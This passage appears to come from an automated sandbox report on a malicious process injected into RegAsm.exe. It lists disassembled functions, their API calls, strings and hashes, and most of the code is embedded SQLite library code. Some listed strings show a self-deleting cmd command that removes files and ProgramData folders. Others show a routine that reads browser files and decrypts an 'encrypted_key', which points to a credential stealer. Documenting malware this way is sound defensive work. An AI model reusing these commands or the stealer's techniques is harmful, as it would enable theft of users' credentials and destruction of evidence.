                                                    • String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
                                                    • API String ID: 0-3918257174
                                                    • Opcode ID: 89e84e2e4d4325b5aa329622e06957a7847cdbdd05499dc82c7d7d1925c226ee
                                                    • Instruction ID: 85b0211a3c0a74672508bb17a311684fbfdeda31874060f9d839023315e605b5
                                                    • Opcode Fuzzy Hash: 89e84e2e4d4325b5aa329622e06957a7847cdbdd05499dc82c7d7d1925c226ee
                                                    • Instruction Fuzzy Hash: AC5147719003229BC7009F24ED44B9BB7E8EF84765F140564FD469B241E73AF916EBA1
                                                    Function 1FB68F40 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %!.15g$%!.20e$%lld$NULL$NULL
                                                    • API String ID: 0-2115304644
                                                    • Opcode ID: 7e81b1d6de7bdf747218c046ce4b180d74700afc102f6221691c59350f2ddb5b
                                                    • Instruction ID: 31a1f19db781ff53b959d1d78c0c28e9b1fba348f1c0c6f621df2977d50328a0
                                                    • Opcode Fuzzy Hash: 7e81b1d6de7bdf747218c046ce4b180d74700afc102f6221691c59350f2ddb5b
                                                    • Instruction Fuzzy Hash: 51516879904711ABD700DF18DC41ADBB7E4EF81314F45499DF89AA7202E33AF649C7A2
                                                    Function 1FA33420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-2988319395
                                                    • Opcode ID: 12fff374ad93eb6b276d09b8b72e3905186011ec531b884f12f67464e49cf815
                                                    • Instruction ID: 271b5805bf214ae7bc3d5de6fed57db8d3d7558b261945658e007c09aa864ad8
                                                    • Opcode Fuzzy Hash: 12fff374ad93eb6b276d09b8b72e3905186011ec531b884f12f67464e49cf815
                                                    • Instruction Fuzzy Hash: AFD1B1B0D08342AFE7108F25DC84B9B77E8BF44726F044568E95A9A341E73EF554CBA2
                                                    Function 1FABEF60 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,origin
                                                    • API String ID: 0-4198660907
                                                    • Opcode ID: 11c78489eee4d59e85224cb554d7652c0832d21bfb76a0e0fea2fbc7e3a20f3f
                                                    • Instruction ID: 8a35a5a2895ead7c561e87b57bda789a2071616fdbb796104039e7f95628cadf
                                                    • Opcode Fuzzy Hash: 11c78489eee4d59e85224cb554d7652c0832d21bfb76a0e0fea2fbc7e3a20f3f
                                                    • Instruction Fuzzy Hash: 31719CB5508301DFC7109FA9D88095ABBE9FF89710F544D2CFA8686620E73BE861DB52
                                                    Function 1FBB7C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s%c%s$winFullPathname1$winFullPathname2
                                                    • API String ID: 0-2846052723
                                                    • Opcode ID: 3a9490bbf9496e38c51eac32a0943ed5a87572aedab9c7af961ea41f29b7bb8e
                                                    • Instruction ID: d8016add2d597649e3f90ff9cdd3850ffe030d27cc0b5d13790a8de65b5b5bd3
                                                    • Opcode Fuzzy Hash: 3a9490bbf9496e38c51eac32a0943ed5a87572aedab9c7af961ea41f29b7bb8e
                                                    • Instruction Fuzzy Hash: E241BDB5B043412BF7115A24BC88FBB37D9EF41660F28056CF98A59181E62BF952C372
                                                    Function 0041A508 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 0041A51F
                                                    • memset.MSVCRT ref: 0041A52F
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041A545
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0041A717
                                                    • memset.MSVCRT ref: 0041A725
                                                    • memset.MSVCRT ref: 0041A73B
                                                    • ExitProcess.KERNEL32 ref: 0041A750
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpymemset$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                    • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                    • API String ID: 1134881415-1686486140
                                                    • Opcode ID: a2c79353035dc7988b6cc5809f2dfe8a9fe245d89de2abe060d15ad9bc2eef87
                                                    • Instruction ID: 2ae990150077dd927b68574e96d60916ec747782fc498b2aa95a2e9cfca832fe
                                                    • Opcode Fuzzy Hash: a2c79353035dc7988b6cc5809f2dfe8a9fe245d89de2abe060d15ad9bc2eef87
                                                    • Instruction Fuzzy Hash: A151EFB29111189ADB15FB51DD92FDD777CAF54305F8000AAF31AA21A2DF386B88CF58
                                                    Function 00417104 Relevance: 19.7, APIs: 13, Instructions: 174stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 0041711F
                                                    • memset.MSVCRT ref: 00417135
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00417164
                                                    • lstrcatA.KERNEL32(?), ref: 00417182
                                                    • lstrcatA.KERNEL32(?,?), ref: 00417196
                                                    • lstrcatA.KERNEL32(?), ref: 004171A9
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412F4C: GetFileAttributesA.KERNEL32(00000000,?,0040E526,?,00425200,?,?), ref: 00412F5B
                                                      • Part of subcall function 00407F8E: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00407FDF
                                                      • Part of subcall function 00407F8E: memcmp.MSVCRT ref: 00408034
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                      • Part of subcall function 004134CA: GlobalAlloc.KERNEL32(00000000,0041723B,0041723B), ref: 004134DC
                                                    • StrStrA.SHLWAPI(?), ref: 0041724F
                                                    • GlobalFree.KERNEL32(?), ref: 00417341
                                                      • Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407DE6
                                                      • Part of subcall function 00407DC2: LocalAlloc.KERNEL32(00000040,00406095,?,?,00406095,00000000,?), ref: 00407DF7
                                                      • Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407E1D
                                                      • Part of subcall function 00407DC2: LocalFree.KERNEL32(00000000,?,?,00406095,00000000,?), ref: 00407E31
                                                      • Part of subcall function 00408093: memcmp.MSVCRT ref: 004080AD
                                                      • Part of subcall function 00408093: memset.MSVCRT ref: 004080DF
                                                      • Part of subcall function 00408093: LocalAlloc.KERNEL32(00000040,?), ref: 0040812D
                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,000003E8), ref: 004172D7
                                                    • StrCmpCA.SHLWAPI(?,00425200,?,?,?,?,000003E8), ref: 004172F4
                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,000003E8), ref: 00417304
                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,000003E8), ref: 00417316
                                                    • lstrcatA.KERNEL32(00000000,00428E48,?,?,?,?,000003E8), ref: 00417324
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                    • String ID:
                                                    • API String ID: 1812951797-0
                                                    • Opcode ID: 2835926dd3b7af99b7d2bff13f43dcf0ab9554a6fddaecd92bc8552e99537314
                                                    • Instruction ID: a608612f317fa1ecc60f7c5688a44701b5bd02aa08d55213bb3fb888d79c7ab7
                                                    • Opcode Fuzzy Hash: 2835926dd3b7af99b7d2bff13f43dcf0ab9554a6fddaecd92bc8552e99537314
                                                    • Instruction Fuzzy Hash: B4613B72D0021CABDF11AFA0DD4AFDD77BDAB08304F0440AAF615E6091EB399B949F55
                                                    Function 1FB4ECF0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 335COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: content$docsize
                                                    • API String ID: 0-1024698521
                                                    • Opcode ID: 06748c555cd376a7b021af47e36a68f1bb6b302d89a067c13a85593c4c774dae
                                                    • Instruction ID: f369ea9b13dab3edeee35db1d5df36b7093f20933d41b903a22f43c1c1f616b5
                                                    • Opcode Fuzzy Hash: 06748c555cd376a7b021af47e36a68f1bb6b302d89a067c13a85593c4c774dae
                                                    • Instruction Fuzzy Hash: CCC10571A08312ABD710CF24EA84B9B73E4FF84350F650528FD469B250E77AF856DB92
                                                    Function 1FAD5470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %!0.15g$%lld$JSON cannot hold BLOB values
                                                    • API String ID: 0-1047910854
                                                    • Opcode ID: 88f15654885d77b5045bea1ae456afa0a4b00fd6911b6242e1a54913ea0a2ae6
                                                    • Instruction ID: cdc6a789d7351d03fa403141a0e3a1a1043a0c2ac6f6481a1577cdb304d034ec
                                                    • Opcode Fuzzy Hash: 88f15654885d77b5045bea1ae456afa0a4b00fd6911b6242e1a54913ea0a2ae6
                                                    • Instruction Fuzzy Hash: 1451AF7E6043006EE3115A18DC41FFA3BEADFC2335F14025DF9914A282EB6FB55182A2
                                                    Function 1FA53D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %Q.$=%Q$PRAGMA
                                                    • API String ID: 0-2099833060
                                                    • Opcode ID: 74c77692082be7cee30039d61a12eb547f4dad1cd79bb863cd3c99b302260748
                                                    • Instruction ID: 72ed5fc4639fe8807c62b8dd799b4b57f442e5d3d14f9cd27b1eb37e11a78daa
                                                    • Opcode Fuzzy Hash: 74c77692082be7cee30039d61a12eb547f4dad1cd79bb863cd3c99b302260748
                                                    • Instruction Fuzzy Hash: 5471E476A083119BDB00DF68D880B9BB7E5AF84714F040569FD459B251E73EF918CBA2
                                                    Function 0041FB08 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 183fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 0041FB15
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041FBD2
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041FBEE
                                                    • ReadFile.KERNEL32(00000000,?,00000002,?,00000000), ref: 0041FC03
                                                    • SetFilePointer.KERNEL32(00000000,00000024,00000000,00000000), ref: 0041FC12
                                                    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0041FC27
                                                    • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 0041FC4D
                                                    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0041FC62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$PointerRead$HandleInformationSize
                                                    • String ID: ($PE
                                                    • API String ID: 2979504256-3347799738
                                                    • Opcode ID: afed1484dbe08c80af930b0dec15a04a84a0063f91bf39101e5236698e50722d
                                                    • Instruction ID: 96366066bc1ce1ce1fd13419add1104be1303b26a02272d6b2b990da334fe007
                                                    • Opcode Fuzzy Hash: afed1484dbe08c80af930b0dec15a04a84a0063f91bf39101e5236698e50722d
                                                    • Instruction Fuzzy Hash: 4F71F871910208EFEB15CFD8D845BEDBBB0FF04304F50846AF515EA290D779AA96DB88
                                                    Function 1FA3B980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
